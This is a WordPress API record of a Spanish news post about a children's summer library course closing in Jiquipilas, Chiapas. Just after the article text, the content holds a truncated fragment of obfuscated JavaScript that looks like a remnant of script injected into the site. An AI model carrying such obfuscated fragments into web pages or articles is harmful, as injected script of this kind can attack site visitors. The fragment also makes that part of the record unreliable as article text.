{"id":11431,"date":"2023-08-21T05:56:44","date_gmt":"2023-08-21T05:56:44","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11431"},"modified":"2023-08-21T05:56:45","modified_gmt":"2023-08-21T05:56:45","slug":"madely-montejo-clausura-curso-de-verano-mis-vacaciones-en-la-biblioteca","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11431","title":{"rendered":"Madely Montejo clausura curso de verano Mis Vacaciones en la Biblioteca"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"11432\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0021-1024x576.jpg\" alt=\"\" class=\"wp-image-11432\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0021-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0021-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0021-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0021.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"11433\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0020-1024x576.jpg\" alt=\"\" class=\"wp-image-11433\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0020-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0020-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0020-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0020.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"11434\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0019-1024x576.jpg\" alt=\"\" class=\"wp-image-11434\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0019-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0019-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0019-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/08\/IMG-20230820-WA0019.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p> \u2022 Agradeci\u00f3 la presencia de Fabi\u00e1n Emmanuel Rivera Ju\u00e1rez Director de Red de Bibliotecas P\u00fablicas del Estado y C\u00e9sar Trujillo S\u00e1nchez. \u2022 52 ni\u00f1os y ni\u00f1as participaron en estas cursos de verano. Jiquipilas, Chiapas.- En compa\u00f1\u00eda de funcionarios estatales la Presidenta del sistema DIF Madely Montejo Maza clausur\u00f3 el curso de verano Mis Vacaciones en la Biblioteca que fue dirigido a alumnos en edad escolar.Refiri\u00f3 que estas actividades permiten a los alumnos a aprovechar de manera productiva sus vacaciones escolares, lo cual tiene un impacto positivo en lo social y en lo acad\u00e9mico.Personal de la biblioteca p\u00fablica municipal de Jiquipilas particip\u00f3 con 52 infantes con actividades deportivas como Tochito Bandera, excursionismo, campismo, regularizaci\u00f3n de matem\u00e1ticas y elaboraci\u00f3n de manualidades con material reciclado, taller de lectura y redacci\u00f3n. A las ni\u00f1as y ni\u00f1os participantes les obsequiaron refrescos, pizzas y pastel como parte del convivio de clausura.La primera dama de Jiquipilas les agradeci\u00f3 a cada de los alumnos y a sus padres de familia por permitirles participar en este curso de verano.Estuvieron presentes Fabi\u00e1n Emmanuel Rivera Ju\u00e1rez Director de Ted de Bibliotecas P\u00fablicas del Estado y C\u00e9sar Trujillo S\u00e1nchez representante de Maritza Concepci\u00f3n Maranto Zepeda Directora de CONECULTA.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Agradeci\u00f3 la presencia de Fabi\u00e1n Emmanuel Rivera Ju\u00e1rez Director de Red de Bibliotecas P\u00fablicas del Estado y C\u00e9sar Trujillo S\u00e1nchez. \u2022 52 ni\u00f1os y ni\u00f1as participaron en estas cursos de verano. Jiquipilas, Chiapas.- En compa\u00f1\u00eda de funcionarios estatales la Presidenta del sistema DIF Madely Montejo Maza clausur\u00f3 el curso de verano Mis Vacaciones en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11434,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11431","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11431","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11431"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11431\/revisions"}],"predecessor-version":[{"id":11435,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11431\/revisions\/11435"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11434"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11431"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}